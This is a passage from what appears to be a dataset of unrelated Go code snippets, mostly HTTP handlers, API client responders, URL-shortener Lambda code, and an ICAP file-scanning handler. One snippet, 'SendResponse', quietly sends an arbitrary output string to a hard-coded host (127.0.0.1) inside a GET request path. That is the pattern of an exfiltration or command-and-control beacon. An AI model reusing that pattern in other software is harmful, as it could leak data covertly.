sourcecode:: http\\n\\n\")\n\tfmt.Fprintf(z.w, \" %s %s\\n\", resp.Proto, resp.Status)\n\tfor k := range resp.Header {\n\t\tfmt.Fprintf(z.w, \" %s: %s\\n\", k, resp.Header.Get(k))\n\t}\n\tfmt.Fprintf(z.w, \"\\n\")\n\n\tvar jb interface{}\n\tif len(body) > 0 {\n\t\trequire.NoError(t, json.Unmarshal(body, &jb))\n\t\tb, err := json.MarshalIndent(jb, \" \", \" \")\n\t\trequire.NoError(t, err)\n\t\tfmt.Fprintf(z.w, \" %s\\n\\n\", b)\n\t}\n\n}", "func SendResponse(output string){\n\n url := \"https://127.0.0.1/\" + url.PathEscape(output)\n _, err := http.Get(url)\n if err != nil {\n\t\t//log.Fatalln(err)\n\t\treturn\n }\n\n}", "func (client MultipleResponsesClient) Get202None204NoneDefaultNone204NoneResponder(resp *http.Response) (result autorest.Response, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK,http.StatusAccepted,http.StatusNoContent),\n autorest.ByClosing())\n result.Response = resp\n return\n}", "func (serv *Server) GET(url string, handlers ...Handler) {\n\tserv.Handle(\"GET\", url, handlers...)\n}", "func (t *RestURL) MaybeGet(w http.ResponseWriter, r *http.Request) {\n\tt.Log.Handle(w, r, nil, \"begin\", \"RestURL\", \"MaybeGet\")\n\n\txxRouteVars := mux.Vars(r)\n\n\txxURLValues := r.URL.Query()\n\tvar urlArg1 *string\n\tif false {\n\t} else if _, ok := xxRouteVars[\"arg1\"]; ok {\n\t\txxTmpurlArg1 := xxRouteVars[\"arg1\"]\n\t\turlArg1 = &xxTmpurlArg1\n\t} else if _, ok := xxURLValues[\"arg1\"]; ok {\n\t\txxTmpurlArg1 := xxURLValues.Get(\"arg1\")\n\t\turlArg1 = &xxTmpurlArg1\n\t}\n\n\tt.embed.MaybeGet(urlArg1)\n\n\tw.WriteHeader(200)\n\n\tt.Log.Handle(w, r, nil, \"end\", \"RestURL\", \"MaybeGet\")\n\n}", "func httpExtractor(rc *Context, errc chan error) <-chan interface{} {\r\n\tout := make(chan interface{}, 1)\r\n\terrCtx := \"Handlers::HTTPExtractor\"\r\n\r\n\tgo func() {\r\n\t\tdefer close(out)\r\n\r\n\t\treqMap := make(map[string]interface{})\r\n\t\treqBuilder := rc.Builder\r\n\r\n\t\t// Path variables extractor\r\n\t\tif reqBuilder.ExtractParams {\r\n\t\t\tparams := rc.PathVars()\r\n\r\n\t\t\tif params == nil || len(params) == 0 {\r\n\t\t\t\tlogging.Msg(rc.uID, \"HttpExtractor\", logging.Error, response.ErrorCodeText(response.ErrMissingRequestParams))\r\n\t\t\t\terrc <- response.New(response.ErrMissingRequestParams, errCtx)\r\n\t\t\t\trc.CtxCancel()\r\n\t\t\t\treturn\r\n\t\t\t}\r\n\r\n\t\t\treqMap[ParamKey] = params[ParamKey]\r\n\t\t}\r\n\r\n\t\t// Body extractor\r\n\t\tif reqBuilder.ExtractBody {\r\n\t\t\tdecBody, err := rc.Body()\r\n\t\t\tif err != nil {\r\n\t\t\t\tlogging.Msg(rc.uID, \"HttpExtractor\", logging.Error, response.ErrorCodeText(response.ErrDecoding))\r\n\t\t\t\terrc <- response.New(response.ErrDecoding, errCtx)\r\n\t\t\t\trc.CtxCancel()\r\n\t\t\t\treturn\r\n\t\t\t}\r\n\r\n\t\t\treqMap[ParamBody] = &decBody\r\n\t\t}\r\n\r\n\t\t// Send the data to the output channel but return early\r\n\t\t// if the context has been cancelled.\r\n\t\tselect {\r\n\t\tcase out <- reqMap:\r\n\t\tcase <-rc.Ctx.Done():\r\n\t\t\treturn\r\n\t\t}\r\n\t}()\r\n\r\n\treturn out\r\n}", "func apihandler(w http.ResponseWriter, r *http.Request) {\n\tcatalogMatch := catalogRequestRegex.FindStringSubmatch(r.RequestURI)\n\tcoreMatch := coreRequestRegex.FindStringSubmatch(r.RequestURI)\n\n\tif len(catalogMatch) == 0 && len(coreMatch) == 0 {\n\t\tw.WriteHeader(500)\n\t\tw.Write([]byte(fmt.Sprintf(\"unexpected request %s %s doesn't match %q or %q\", r.Method, r.RequestURI, catalogRequestRegex, coreRequestRegex)))\n\t\treturn\n\t}\n\n\tif r.Method != http.MethodGet {\n\t\t// Anything more interesting than a GET, i.e. it relies upon server behavior\n\t\t// probably should be an integration test instead\n\t\tw.WriteHeader(500)\n\t\tw.Write([]byte(fmt.Sprintf(\"unallowed method for request %s %s\", r.Method, r.RequestURI)))\n\t\treturn\n\t}\n\n\tvar match string\n\tif len(catalogMatch) > 0 {\n\t\tmatch = filepath.Join(\"catalog\", catalogMatch[1])\n\t} else {\n\t\tmatch = filepath.Join(\"core\", coreMatch[1])\n\t}\n\n\trelpath, err := url.PathUnescape(match)\n\tif err != nil {\n\t\tw.WriteHeader(500)\n\t\tw.Write([]byte(fmt.Sprintf(\"could not unescape path %s (%s)\", match, err)))\n\t\treturn\n\t}\n\tresponseFile := filepath.Join(\"responses\", relpath+\".json\")\n\t_, response, err := test.GetTestdata(responseFile)\n\tif err != nil {\n\t\tw.WriteHeader(500)\n\t\tw.Write([]byte(fmt.Sprintf(\"request %s has no matching testdata at %s (%s)\", r.RequestURI, responseFile, err)))\n\t\treturn\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.Write(response)\n}", "func (g *smartContractGW) getStreamOrSub(res http.ResponseWriter, req *http.Request, params httprouter.Params) {\n\tlog.Infof(\"--> %s %s\", req.Method, req.URL)\n\n\tif g.sm == nil {\n\t\tg.gatewayErrReply(res, req, errors.New(errEventSupportMissing), 405)\n\t\treturn\n\t}\n\n\tvar retval interface{}\n\tvar err error\n\tif strings.HasPrefix(req.URL.Path, events.SubPathPrefix) {\n\t\tretval, err = g.sm.SubscriptionByID(req.Context(), params.ByName(\"id\"))\n\t} else {\n\t\tretval, err = g.sm.StreamByID(req.Context(), params.ByName(\"id\"))\n\t}\n\tif err != nil {\n\t\tg.gatewayErrReply(res, req, err, 404)\n\t\treturn\n\t}\n\n\tstatus := 200\n\tlog.Infof(\"<-- %s %s [%d]\", req.Method, req.URL, status)\n\tres.Header().Set(\"Content-Type\", \"application/json\")\n\tres.WriteHeader(status)\n\tenc := json.NewEncoder(res)\n\tenc.SetIndent(\"\", \" \")\n\tenc.Encode(retval)\n}", "func (client MultipleResponsesClient) Get202None204NoneDefaultNone400NoneResponder(resp *http.Response) (result autorest.Response, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK,http.StatusAccepted,http.StatusNoContent),\n autorest.ByClosing())\n result.Response = resp\n return\n}", "func (g *RouterGroup) GET(url string, handler ...Handler) *RouterGroup {\n\tg.app.routeANY = false\n\tg.AppendReqAndResp(url, \"get\", handler)\n\treturn g\n}", "func (client HTTPSuccessClient) Get200Responder(resp *http.Response) (result Bool, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK),\n autorest.ByUnmarshallingJSON(&result.Value),\n autorest.ByClosing())\n result.Response = autorest.Response{Response: resp}\n return\n}", "func (client MultipleResponsesClient) Get202None204NoneDefaultNone202InvalidResponder(resp *http.Response) (result autorest.Response, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK,http.StatusAccepted,http.StatusNoContent),\n autorest.ByClosing())\n result.Response = resp\n return\n}", "func (c *Conn) OnDescribe(ctx *gortsplib.ServerHandlerOnDescribeCtx) (*base.Response, *gortsplib.ServerStream, error) {\n\tresc := make(chan readpublisher.DescribeRes)\n\tc.pathMan.OnReadPublisherDescribe(readpublisher.DescribeReq{\n\t\tPathName: ctx.Path,\n\t\tURL: ctx.Req.URL,\n\t\tIP: c.ip(),\n\t\tValidateCredentials: func(authMethods []headers.AuthMethod, pathUser string, pathPass string) error {\n\t\t\treturn c.ValidateCredentials(authMethods, pathUser, pathPass, ctx.Path, ctx.Req)\n\t\t},\n\t\tRes: resc,\n\t})\n\tres := <-resc\n\n\tif res.Err != nil {\n\t\tswitch terr := res.Err.(type) {\n\t\tcase readpublisher.ErrAuthNotCritical:\n\t\t\treturn terr.Response, nil, nil\n\n\t\tcase readpublisher.ErrAuthCritical:\n\t\t\t// wait some seconds to stop brute force attacks\n\t\t\t<-time.After(pauseAfterAuthError)\n\n\t\t\treturn terr.Response, nil, errors.New(terr.Message)\n\n\t\tcase readpublisher.ErrNoOnePublishing:\n\t\t\treturn &base.Response{\n\t\t\t\tStatusCode: base.StatusNotFound,\n\t\t\t}, nil, res.Err\n\n\t\tdefault:\n\t\t\treturn &base.Response{\n\t\t\t\tStatusCode: base.StatusBadRequest,\n\t\t\t}, nil, res.Err\n\t\t}\n\t}\n\n\tif res.Redirect != \"\" {\n\t\treturn &base.Response{\n\t\t\tStatusCode: base.StatusMovedPermanently,\n\t\t\tHeader: base.Header{\n\t\t\t\t\"Location\": base.HeaderValue{res.Redirect},\n\t\t\t},\n\t\t}, nil, nil\n\t}\n\n\treturn &base.Response{\n\t\tStatusCode: base.StatusOK,\n\t}, res.Stream, nil\n}", "func onGetRedirectLink(w http.ResponseWriter, r *http.Request) {\n\tvalues := r.URL.Query()\n\tshortURL, ok := values[\"shortURL\"]\n\tif ok {\n\t\tw.WriteHeader(http.StatusOK)\n\t\tif len(shortURL) >= 1 {\n\t\t\tcorrectURL, err := url.ParseRequestURI(shortURL[0]) // parsing the string to correct URL\n\t\t\tif err != nil {\n\t\t\t\tresponseToCLient(w, \"Please enter the correct and complete url, example - http://google.com\")\n\t\t\t} else {\n\t\t\t\tif correctURL.Host != \"mydomain.com\" { // Checking whether this url is from our domain only\n\t\t\t\t\tresponseToCLient(w, \"Not the correct short link provided by mydomain.com\")\n\t\t\t\t} else {\n\t\t\t\t\ta := correctURL.Path[1:]\n\t\t\t\t\tstr, ok := getLongURL(a)\n\t\t\t\t\tif ok {\n\t\t\t\t\t\tresponseToCLient(w, \"Redirect Link is : \"+str)\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t\tresponseToCLient(w, str)\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tresponseToCLient(w, \"Please check the request parameters\")\n\t\t}\n\t} else {\n\t\tresponseToCLient(w, \"No shortURL found, Please check the request parameters\")\n\n\t}\n\n}", "func (r *tee) Response(filters.FilterContext) {}", "func (t *RestURL) GetAll2(w http.ResponseWriter, r *http.Request) {\n\tt.Log.Handle(w, r, nil, \"begin\", \"RestURL\", \"GetAll2\")\n\n\txxRouteVars := mux.Vars(r)\n\n\txxURLValues := r.URL.Query()\n\n\tvar urlValues map[string]string\n\t{\n\t\turlValues = map[string]string{}\n\t\txxTempValue := urlValues\n\n\t\tfor k, v := range xxRouteVars {\n\t\t\tif len(v) > 0 {\n\t\t\t\txxTempValue[k] = v\n\t\t\t}\n\t\t}\n\n\t\tfor k, v := range xxURLValues {\n\t\t\tif len(v) > 0 {\n\t\t\t\tif _, ok := xxTempValue[k]; ok {\n\t\t\t\t\tfor _, vv := range v {\n\t\t\t\t\t\tif len(vv) > 0 {\n\t\t\t\t\t\t\txxTempValue[k] = vv\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\tfor _, vv := range v {\n\t\t\t\t\t\tif len(vv) > 0 {\n\t\t\t\t\t\t\txxTempValue[k] = vv\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tt.embed.GetAll2(urlValues)\n\n\tw.WriteHeader(200)\n\n\tt.Log.Handle(w, r, nil, \"end\", \"RestURL\", \"GetAll2\")\n\n}", "func Handler(request events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\t\t\n\t\n\n\tif request.HTTPMethod == \"GET\" {\n\t\tfmt.Printf(\"GET METHOD\\n\")\n\t\tShortLink := request.QueryStringParameters[\"ShortLink\"]\n\t\tPutLinkAnalyticsInDynamoDB(request, ShortLink)\n\t\tfmt.Printf(\"short link %s \", ShortLink)\n\t\tif ShortLink == \"\" {\n\t\t\treturn events.APIGatewayProxyResponse{\n\t\t\t\tBody: \"{\\\"error\\\" : \\\"Short link not provided.\\\"} \", \n\t\t\t\tStatusCode: 400,\n\t\t\t\tHeaders: map[string]string{\n\t\t\t\t\t\"Access-Control-Allow-Origin\": \"*\",\n\t\t\t\t},\n\t\t\t}, nil\n\t\t}\n\t\titem, Err := GetItemFromDynamoDB(\"ShortLink\", ShortLink)\n\t\tif Err != nil {\n\t\t\tErrorMessage := fmt.Sprintf(\" { \\\"error\\\" : \\\"%s\\\" } \", Err.Error())\n\t\t\treturn events.APIGatewayProxyResponse{\n\t\t\t\tBody: ErrorMessage, \n\t\t\t\tStatusCode: 400,\n\t\t\t\tHeaders: map[string]string{\n\t\t\t\t\t\"Access-Control-Allow-Origin\" : \"*\",\n\t\t\t\t},\n\t\t\t}, nil\n\t\t}\n\t\tif (item == Link{}) {\n\t\t\tErrorMessage := fmt.Sprintf(\" { \\\"error\\\" : \\\"Short link not found.\\\" } \")\n\t\t\treturn events.APIGatewayProxyResponse{\n\t\t\t\tBody: ErrorMessage, \n\t\t\t\tStatusCode: 404,\n\t\t\t\tHeaders: map[string]string{\n\t\t\t\t\t\"Access-Control-Allow-Origin\" : \"*\",\n\t\t\t\t},\n\t\t\t}, nil\n\t\t}\n\t\tmessage := fmt.Sprintf(\" { \\\"ShortLink\\\" : \\\"%s\\\", \\\"LongURL\\\" : \\\"%s\\\" } \", item.ShortLink, item.LongURL)\n\t\treturn events.APIGatewayProxyResponse{\n\t\t\tBody: message, \n\t\t\tStatusCode: 200,\n\t\t\tHeaders: map[string]string{\n\t\t\t\t\"Access-Control-Allow-Origin\" : \"*\",\n\t\t\t},\n\t\t}, nil\n\t} else if request.HTTPMethod == \"POST\" {\n\t\tfmt.Printf(\"POST METHOD\\n\")\n\n\t\t// BodyRequest will be used to take the json response from client and build it\n\t\tbodyRequest := BodyRequest{\n\t\t\tRequestLongURL: \"\",\n\t\t}\n\t\tfmt.Printf(\"bodyRequest: %+v\\n\", bodyRequest)\n\t\tfmt.Printf(\"request.Body: %+v\\n\", request.Body)\n\t\t// Unmarshal the json, return 404 if Error\n\t\tErr := json.Unmarshal([]byte(request.Body), &bodyRequest)\n\t\tif Err != nil {\n\t\t\treturn events.APIGatewayProxyResponse{\n\t\t\t\tBody: Err.Error(), \n\t\t\t\tStatusCode: 404,\n\t\t\t\tHeaders: map[string]string{\n\t\t\t\t\t\"Access-Control-Allow-Origin\" : \"*\",\n\t\t\t\t},\n\t\t\t}, nil\n\t\t}\n\t\tfmt.Printf(\"bodyRequest: %+v\\n\", bodyRequest)\n\t\tLongURLErr := validation.Validate(bodyRequest.RequestLongURL,\n\t\t\t\t\t\tvalidation.Required, // not empty\t\t\t\t\t\t\n\t\t\t\t\t\tis.URL, // is a valid URL\n\t\t\t\t\t)\n\t\tfmt.Printf(\"LongURLErr: %s\\n\", LongURLErr)\n\t\tif LongURLErr != nil {\n\t\t\treturn events.APIGatewayProxyResponse{\n\t\t\t\tBody: \"{\\\"error\\\" : \\\"URL is not valid\\\"}\", \n\t\t\t\tStatusCode: 404,\n\t\t\t\tHeaders: map[string]string{\n\t\t\t\t\t\"Access-Control-Allow-Origin\" : \"*\",\n\t\t\t\t},\n\t\t\t}, nil\n\t\t}\n\t\tfmt.Printf(\"RequestLongURL: %s\\n\", bodyRequest.RequestLongURL)\t\t\n\t\tLongURLHashBytes := sha256.Sum256([]byte(bodyRequest.RequestLongURL))\n\t\tLongURLHash := hex.EncodeToString(LongURLHashBytes[:])\n\t\tfmt.Printf(\"LongURLHash %s\\n\", LongURLHash)\n\t\titem, Err := GetShortLinkFromHash(LongURLHash)\n\t\tif Err != nil {\n\t\t\tErrorMessage := fmt.Sprintf(\" { \\\"error\\\" : \\\"%s\\\" } \", Err.Error())\n\t\t\treturn events.APIGatewayProxyResponse{\n\t\t\t\tBody: ErrorMessage, \n\t\t\t\tStatusCode: 400,\n\t\t\t\tHeaders: map[string]string{\n\t\t\t\t\t\"Access-Control-Allow-Origin\" : \"*\",\n\t\t\t\t},\n\t\t\t}, nil\n\t\t}\n\t\tfmt.Printf(\"item %s\\n\", item)\n\t\tbodyResponse := BodyResponse{}\n\t\tif (item == Link{}) {\n\t\t\tShortLinkRedisVal := CalcBase64()\t\n\t\t\tfmt.Println(ShortLinkRedisVal)\n\t\t\titem := Link{\n\t\t\t\tShortLink: ShortLinkRedisVal,\n\t\t\t\tHash: LongURLHash,\n\t\t\t\tLongURL: bodyRequest.RequestLongURL,\n\t\t\t}\n\t\t\t_, Err = PutLinkItemFromDynamoDB(item)\n\t\t\tif Err != nil {\n\t\t\t\tErrorMessage := fmt.Sprintf(\" { \\\"error\\\" : \\\"%s\\\" } \", Err.Error())\n\t\t\t\treturn events.APIGatewayProxyResponse{\n\t\t\t\t\tBody: ErrorMessage, \n\t\t\t\t\tStatusCode: 400,\n\t\t\t\t\tHeaders: map[string]string{\n\t\t\t\t\t\t\"Access-Control-Allow-Origin\" : \"*\",\n\t\t\t\t\t},\n\t\t\t\t}, nil\n\t\t\t}\n\t\t\tbodyResponse = BodyResponse{\n\t\t\t\tResponseShortLink: ShortLinkRedisVal,\n\t\t\t}\n\t\t} else {\n\t\t\t// We will build the BodyResponse and send it back in json form\n\t\t\tbodyResponse = BodyResponse{\n\t\t\t\tResponseShortLink: item.ShortLink,\n\t\t\t}\n\t\t\t\n\t\t}\n\t\tresponse, Err := json.Marshal(&bodyResponse)\n\t\tif Err != nil {\n\t\t\tErrorMessage := fmt.Sprintf(\" { \\\"error\\\" : \\\"%s\\\" } \", Err.Error())\n\t\t\treturn events.APIGatewayProxyResponse{\n\t\t\t\tBody: ErrorMessage, \n\t\t\t\tStatusCode: 404,\n\t\t\t\tHeaders: map[string]string{\n\t\t\t\t\t\"Access-Control-Allow-Origin\" : \"*\",\n\t\t\t\t},\n\t\t\t}, nil\n\t\t}\n\t\t\n\t\treturn events.APIGatewayProxyResponse{\n\t\t\tBody: string(response), \n\t\t\tStatusCode: 200,\n\t\t\tHeaders: map[string]string{\n\t\t\t\t\"Access-Control-Allow-Origin\" : \"*\",\n\t\t\t},\n\t\t}, nil\n\t} else {\n\t\tfmt.Printf(\"NEITHER\\n\")\n\t\treturn events.APIGatewayProxyResponse{\n\t\t\tStatusCode: 200,\n\t\t\tHeaders: map[string]string{\n\t\t\t\t\"Access-Control-Allow-Origin\" : \"*\",\n\t\t\t},\n\t\t}, nil\n\t}\n}", "func lookupEndpoint(urlStr string) error {\n\tminioRelease := bytes.NewReader([]byte(ReleaseTag))\n\treq, err := http.NewRequest(\"POST\", urlStr, minioRelease)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tclient := &http.Client{\n\t\tTimeout: 1 * time.Second,\n\t\tTransport: &http.Transport{\n\t\t\t// need to close connection after usage.\n\t\t\tDisableKeepAlives: true,\n\t\t},\n\t}\n\n\t// Set content-type.\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\n\t// Set proper server user-agent.\n\treq.Header.Set(\"User-Agent\", globalServerUserAgent)\n\n\t// Retry if the request needs to be re-directed.\n\t// This code is necessary since Go 1.7.x do not\n\t// support retrying for http 307 for POST operation.\n\t// https://github.com/golang/go/issues/7912\n\t//\n\t// FIXME: Remove this when we move to Go 1.8.\n\tfor {\n\t\tresp, derr := client.Do(req)\n\t\tif derr != nil {\n\t\t\tif isNetErrorIgnored(derr) {\n\t\t\t\terrorIf(derr, \"Unable to lookup webhook endpoint %s\", urlStr)\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\treturn derr\n\t\t}\n\t\tif resp == nil {\n\t\t\treturn fmt.Errorf(\"No response from server to download URL %s\", urlStr)\n\t\t}\n\t\tresp.Body.Close()\n\n\t\t// Redo the request with the new redirect url if http 307\n\t\t// is returned, quit the loop otherwise\n\t\tif resp.StatusCode == http.StatusTemporaryRedirect {\n\t\t\tnewURL, uerr := url.Parse(resp.Header.Get(\"Location\"))\n\t\t\tif uerr != nil {\n\t\t\t\treturn uerr\n\t\t\t}\n\t\t\treq.URL = newURL\n\t\t\tcontinue\n\t\t}\n\n\t\t// For any known successful http status, return quickly.\n\t\tfor _, httpStatus := range successStatus {\n\t\t\tif httpStatus == resp.StatusCode {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\n\t\terr = fmt.Errorf(\"Unexpected response from webhook server %s: (%s)\", urlStr, resp.Status)\n\t\tbreak\n\t}\n\n\t// Succes.\n\treturn err\n}", "func (n *NetOp) internal() (resp *http.Response, err error) {\n\tu, _ := url.Parse(n.Endpoint)\n\tu.Scheme = \"https\"\n\tu.Host = n.Host\n\tvar req *http.Request\n\n\tif n.Request == nil {\n\t\treq, err = http.NewRequest(n.Method, u.String(), nil)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t} else {\n\t\tb, err := json.Marshal(n.Request)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif n.Logger != nil {\n\t\t\tn.Logger.LogJSON(b)\n\t\t}\n\t\tr := bytes.NewReader(b)\n\t\treq, err = http.NewRequest(n.Method, u.String(), r)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treq.Header.Set(\"authToken\", n.Token)\n\treq.Header.Set(\"Content-Type\", ContentType)\n\tif n.Logger != nil {\n\t\tn.Println(fmt.Sprintf(\"Do: Endpoint is %v\", n.Endpoint))\n\t\tn.Println(fmt.Sprintf(\"Do: method is %v\", n.Method))\n\t}\n\n\tclient := &http.Client{}\n\tresp, err = client.Do(req)\n\tif err != nil {\n\t\treturn resp, err\n\t}\n\tdefer resp.Body.Close()\n\tb, err := io.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn resp, err\n\t}\n\tn.LogJSON(b)\n\n\t//This catches embedded errors in a response body.\n\ts := string(b)\n\tif BotchedError(n, resp, s) {\n\t\treturn resp, nil\n\t}\n\n\terr = json.Unmarshal(b, &n.Response)\n\tif err != nil {\n\t\t//This catches embedded errors in an error message.\n\t\ts := fmt.Sprintf(\"%v\", err)\n\t\tif BotchedError(n, resp, s) {\n\t\t\treturn resp, nil\n\t\t}\n\t}\n\treturn resp, err\n}", "func (c *Client) get(rawURL string, authenticate bool, out interface{}) error {\n\terr := c.do(rawURL, \"GET\", authenticate, http.StatusOK, nil, out)\n\treturn errio.Error(err)\n}", "func (r *Responder) SeeOther() { r.write(http.StatusSeeOther) }", "func (app *App) GET(url string, handler ...Handler) *App {\n\tapp.routeANY = false\n\tapp.AppendReqAndResp(url, \"get\", handler)\n\treturn app\n}", "func ToICAPEGResp(w icap.ResponseWriter, req *icap.Request) {\n\th := w.Header()\n\th.Set(\"ISTag\", utils.ISTag)\n\th.Set(\"Service\", \"Egirna ICAP-EG\")\n\n\tinfoLogger.LogfToFile(\"Request received---> METHOD:%s URL:%s\\n\", req.Method, req.RawURL)\n\n\tappCfg := config.App()\n\n\tswitch req.Method {\n\tcase utils.ICAPModeOptions:\n\n\t\t/* If any remote icap is enabled, the work flow is controlled by the remote icap */\n\t\tif strings.HasPrefix(appCfg.RespScannerVendor, utils.ICAPPrefix) {\n\t\t\tdoRemoteOPTIONS(req, w, appCfg.RespScannerVendor, appCfg.RespScannerVendorShadow, utils.ICAPModeResp)\n\t\t\treturn\n\t\t} else if strings.HasPrefix(appCfg.RespScannerVendorShadow, utils.ICAPPrefix) { // if the shadow wants to run independently\n\t\t\t//siSvc := service.GetICAPService(appCfg.RespScannerVendorShadow)\n\t\t\t//siSvc.SetHeader(req.Header)\n\t\t\t//updateEmptyOptionsEndpoint(siSvc, utils.ICAPModeResp)\n\t\t\t//go doShadowOPTIONS(siSvc)\n\t\t}\n\n\t\th.Set(\"Methods\", utils.ICAPModeResp)\n\t\th.Set(\"Allow\", \"204\")\n\t\tif pb, _ := strconv.Atoi(appCfg.PreviewBytes); pb > 0 {\n\t\t\th.Set(\"Preview\", appCfg.PreviewBytes)\n\t\t}\n\t\th.Set(\"Transfer-Preview\", utils.Any)\n\t\tw.WriteHeader(http.StatusOK, nil, false)\n\tcase utils.ICAPModeResp:\n\n\t\tdefer req.Response.Body.Close()\n\n\t\tif val, exist := req.Header[\"Allow\"]; !exist || (len(val) > 0 && val[0] != utils.NoModificationStatusCodeStr) { // following RFC3507, if the request has Allow: 204 header, it is to be checked and if it doesn't exists, return the request as it is to the ICAP client, https://tools.ietf.org/html/rfc3507#section-4.6\n\t\t\tdebugLogger.LogToFile(\"Processing not required for this request\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\t/* If any remote icap is enabled, the work flow is controlled by the remote icap */\n\t\tif strings.HasPrefix(appCfg.RespScannerVendor, utils.ICAPPrefix) {\n\t\t\tdoRemoteRESPMOD(req, w, appCfg.RespScannerVendor, appCfg.RespScannerVendorShadow)\n\t\t\treturn\n\t\t}\n\n\t\t/* If the shadow icap wants to run independently */\n\t\tif appCfg.RespScannerVendor == utils.NoVendor && strings.HasPrefix(appCfg.RespScannerVendorShadow, utils.ICAPPrefix) {\n\t\t\t//siSvc := service.GetICAPService(appCfg.RespScannerVendorShadow)\n\t\t\t//siSvc.SetHeader(req.Header)\n\t\t\t//shadowHTTPResp := utils.GetHTTPResponseCopy(req.Response)\n\t\t\t//go doShadowRESPMOD(siSvc, *req.Request, shadowHTTPResp)\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\tif appCfg.RespScannerVendor == utils.NoVendor && appCfg.RespScannerVendorShadow == utils.NoVendor { // if no scanner name provided, then bypass everything\n\t\t\tdebugLogger.LogToFile(\"No respmod scanner provided...bypassing everything\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\t// getting the content type to determine if the response is for a file, and if so, if its allowed to be processed\n\t\t// according to the configuration\n\n\t\tct := utils.GetMimeExtension(req.Preview)\n\n\t\tprocessExts := appCfg.ProcessExtensions\n\t\tbypassExts := appCfg.BypassExtensions\n\n\t\tif utils.InStringSlice(ct, bypassExts) { // if the extension is bypassable\n\t\t\tdebugLogger.LogToFile(\"Processing not required for file type-\", ct)\n\t\t\tdebugLogger.LogToFile(\"Reason: Belongs bypassable extensions\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\tif utils.InStringSlice(utils.Any, bypassExts) && !utils.InStringSlice(ct, processExts) { // if extension does not belong to \"All bypassable except the processable ones\" group\n\t\t\tdebugLogger.LogToFile(\"Processing not required for file type-\", ct)\n\t\t\tdebugLogger.LogToFile(\"Reason: Doesn't belong to processable extensions\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\t// copying the file to a buffer for scanner vendor processing as the file is allowed according the co figuration\n\n\t\tbuf := &bytes.Buffer{}\n\n\t\tif _, err := io.Copy(buf, req.Response.Body); err != nil {\n\t\t\terrorLogger.LogToFile(\"Failed to copy the response body to buffer: \", err.Error())\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\tif buf.Len() > appCfg.MaxFileSize {\n\t\t\tdebugLogger.LogToFile(\"File size too large\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\t// preparing the file meta informations\n\t\t// //filename := utils.GetFileName(req.Request)\n\t\t// //fileExt := utils.GetFileExtension(req.Request)\n\t/*\tfmi := dtos.FileMetaInfo{\n\t\t\tFileName: filename,\n\t\t\tFileType: fileExt,\n\t\t\tFileSize: float64(buf.Len()),\n\t\t}\n*/\n\t\t/* If the shadow virus scanner wants to run independently */\n\t\tif appCfg.RespScannerVendor == utils.NoVendor && appCfg.RespScannerVendorShadow != utils.NoVendor {\n\t\t//\tgo doShadowScan(filename, fmi, buf, \"\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\t//status, sampleInfo := doScan(appCfg.RespScannerVendor, filename, fmi, buf, \"\") // scan the file for any anomalies\n/*\n\t\tif status == http.StatusOK && sampleInfo != nil {\n\t\t\tinfoLogger.LogfToFile(\"The file:%s is %s\\n\", filename, sampleInfo.SampleSeverity)\n\t\t\thtmlBuf, newResp := utils.GetTemplateBufferAndResponse(utils.BadFileTemplate, &dtos.TemplateData{\n\t\t\t\tFileName: sampleInfo.FileName,\n\t\t\t\tFileType: sampleInfo.SampleType,\n\t\t\t\tFileSizeStr: sampleInfo.FileSizeStr,\n\t\t\t\tRequestedURL: utils.BreakHTTPURL(req.Request.RequestURI),\n\t\t\t\tSeverity: sampleInfo.SampleSeverity,\n\t\t\t\tScore: sampleInfo.VTIScore,\n\t\t\t\tResultsBy: appCfg.RespScannerVendor,\n\t\t\t})\n\t\t\tw.WriteHeader(http.StatusOK, newResp, true)\n\t\t\tw.Write(htmlBuf.Bytes())\n\t\t\treturn\n\t\t}\n\n\t\tif status == http.StatusNoContent {\n\t\t\tinfoLogger.LogfToFile(\"The file %s is good to go\\n\", filename)\n\t\t}\n\t\t*/\n\t//\tw.WriteHeader(status, nil, false) // \\\n\n\tcase \"ERRDUMMY\":\n\t\tw.WriteHeader(http.StatusBadRequest, nil, false)\n\t\tdebugLogger.LogToFile(\"Malformed request\")\n\tdefault:\n\t\tw.WriteHeader(http.StatusMethodNotAllowed, nil, false)\n\t\tdebugLogger.LogfToFile(\"Invalid request method %s- 